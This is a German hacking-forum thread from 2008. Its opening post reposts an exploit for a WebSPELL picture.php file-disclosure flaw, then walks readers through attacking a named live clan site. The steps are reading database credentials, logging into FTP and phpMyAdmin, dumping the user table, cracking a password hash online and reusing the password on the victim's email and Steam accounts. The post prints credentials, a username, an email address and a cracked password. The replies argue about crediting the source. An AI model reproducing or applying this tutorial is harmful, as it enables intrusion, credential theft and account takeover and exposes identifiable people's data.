ja hab kein plan ob das schon gibst aber egal schadet ja nicht
Webspell hacken via Exploit
Das Exploit:
Code:
# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability # Discovered by: Trex # Visit: www.Trex-Online.net / www.UnderGround.ag # Comment: Happy easter! # # ___ ___ # / \ / \ ___________________________ # / / \_/ \ \ / \ # \__/\ /\__/ / GIVE ME A CARROT OR I WILL \ # \O O/ \ BLOW UP YOUR HOUSE / # ___/ ^ \___ / ___________________________/ # \___/ /_/ # _/ \_ # __// \\__ # /___\/_\/___\ # # # # Vulnerability 1: # Advantage: works independently from PHP version. # Disadvantage: works dependently from PHP option register_globals (= on). # # http://[SITE][PAHT]/picture.php?file=[FILE] # # # # Vulnerability 2: # Advantage: works independently from PHP option register_globals. # Disadvantage: works dependently from PHP versions (< 4.3.0). # # http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00 # # # # Solution: # http://fixes.trex-online.net/picture.rar # milw0rm.com [2007-04-05]
found by www.milw0rm.com
So das ganze ist sehr einfach.
Ihr geht auf www.google.de und sucht nach:
XTREAM-TEAM-CLAN
oder ihr habt eine Seite die ihr hacken wollt...
Ich nehme jetzt als Beispiel die Seite "http://hossi.ho.ohost.de/"
Von den Ergebnissen sucht ihr euch eine Seite aus und öffnet sie.
Nun ersetzt ihr das:
Code:
http://hossi.ho.ohost.de/index.php?s...action=archive
mit:
Code:
http://hossi.ho.ohost.de/picture.php?file=_mysql.php
um Zugriff auf die MySQL-Datenbank zu erhalten, wo die User-Daten gespeichert sind.
Nun geht ihr auf die Seite:
Code:
http://hossi.ho.ohost.de/picture.php?file=_mysql.php
und es erscheint eine weiße Seite.
Ist aber alles richtig, deswegen macht einen Rechtsklick und geht auf:
"Seitenquelltext anzeigen"
Nun seht ihr die MySQL-Daten, sprich Passwort und Usernamen.
Bei unserem Beispiel sieht das ganze dann so aus:
Code:
<?php $host = "localhost"; $user = "hossi"; $pwd = "darkkrone2"; $db = "hossi"; define(PREFIX, 'webs_'); ?>
Der Username ist also:
"hossi"
Und das Passwort:
"darkkrone2"
Ihr habt 2 Möglichkeiten:
1. Ihr loggt euch auf dem FTP der Homepage ein
Ihr öffnet euren FTP-Clienten und gebt:
"ftp://eureseite.de"
ein.
Also:
"ftp://hossi.ho.ohost.de/"
Gebt Username und Passwort ein und könntet jetzt die ganze Page löschen...
2. Ihr hackt die Datenbank
Ihr geht auf:
phpmyadmin.eureseite.de
also:
phpmyadmin.hossi.ho.ohost.de/
Nun geben wir die Daten ein und sehen die MySQL Datenbank.
Ihr geht ganz links auf den Username also im Bsp:
"hossi (66)" <- die 66 bedeutet die Anzahl der Tabellen...
scrollt ganz nach unten und geht bei "webs_user" auf .
Nun seht ihr die Login-Namen, Passwörter, E-Mail-Adressen und alles andere was die User zu sich angegeben haben.
Ihr sucht euch einen User aus, kopiert den Passwort-Hash...
In unserem Beispiel nehme ich:
Username:
shadow_TZ
Passwort-Hash:
e2d8001eb66b01bd0601c1d3b23c9028
E-Mail:
zenkerthorsten@web.de
Jetzt gehen wir auf:
http://www.md5cracker.de/crack.php
geben den Hash dort ein und erhalten:
GDataOnline - Hash gefunden - Plain: shadow88
Das Passwort ist also "shadow88".
Jetzt habt ihr wieder 2 Möglichkeiten:
1. Ihr könnt euch im E-Mail Acc einloggen:
Ihr geht auf die Seite des E-Mail Hosters und loggt euch mit der E-Mail-Adresse und Passwort ein.
Sollte das Passwort das gleiche sein wie auf der Clan-Page könnt ihr seinen Steam-Account o.ä. abziehen.
2. Ihr loggt euch auf der Clan-Page ein.
Ihr geht also zurück auf die Clan-Page und loggt euch ein.
Wenn der User Admin-Rechte hat, könnt ihr News schreiben, User löschen etc.
Wenn nicht, ist das ganze relativ unwichtig.
QUELLE: www.board.raidrush.ws
Ergebnis 1 bis 5 von 5
Thema: Webspell - hack via Exploit
-
07.09.2008, 20:52 #1DateMake Dialer
- Registriert seit
- 07.08.2008
- Beiträge
- 112
Webspell - hack via Exploit
________________________________________
Interressiert an einer psp Fat (4.xx) dann meld dich bei mir!!
---------------------------------------------------------
-
07.09.2008, 21:02 #2(╯°□°)╯︵ ┻━┻
- Registriert seit
- 27.05.2007
- Beiträge
- 709
Das ist eher ein TuT aber egal. Dieser Expliot ist hier schon 1000ende male gepostet worden !!! Zum TuT :
Ich finde es sehr schön erklärt , ist bestimmt Hilfreich für die n00bs !!!
MfG.
BadboyGER
[B] Meine Seele
[S] Große Liebe
-
07.09.2008, 21:16 #3Der mit Anatidaephobie
- Registriert seit
- 11.07.2008
- Beiträge
- 2.350
Diese "n00bs" sollten lieber was richtiges lernen und mit sowas gar nicht erst anfangen...
Zitat von BadboyGER
mfG. BlackBerry
PDFTT cr3w a.E. — ReiDC0Re, lindor, Sera, berry
please do feed the trolls crew and elk
Ehrenwerte Mitglieder im Ruhestand: OpCodez, SFX.
"Was sich blackberry gerade denkt" — Vorsicht! Frei laufender Wahnsinn!
Zitat von fuckinghot19: "PS: Blackberry ist auf FH der Trollkönig ^^."
An dieser Stelle danke ich all meinen Fans und Hatern gleichermaßen ^.^
-
07.09.2008, 21:36 #4BlackBerry!
- Registriert seit
- 12.07.2008
- Beiträge
- 149
wenn du schon kopierst dann bitte auch die quelle dazu schreiben.
-
07.09.2008, 22:06 #5uncreative
- Registriert seit
- 11.10.2007
- Beiträge
- 943
Trottel?! Zitat von cracker555
Naja, Quelle wäre schon besser, ABER es geht auch ohne. Hauptsache, dass der eine oder der andere etwas daraus lernen kann, dass ist die Hauptsache
Was laberst du für Schei7e?! Credits an den Originalautor sind das Mindeste, was sich gehört! Aus Anstand und Respekt!
@Threadersteller, Threadtitel ist unpassend! -> Reported!
Ansonsten ist das Tutorial ganz okay, aber es gibt schon so viele WebSpell Exploiting Anleitungen, da überragt diese eine auch nicht!
Zitieren
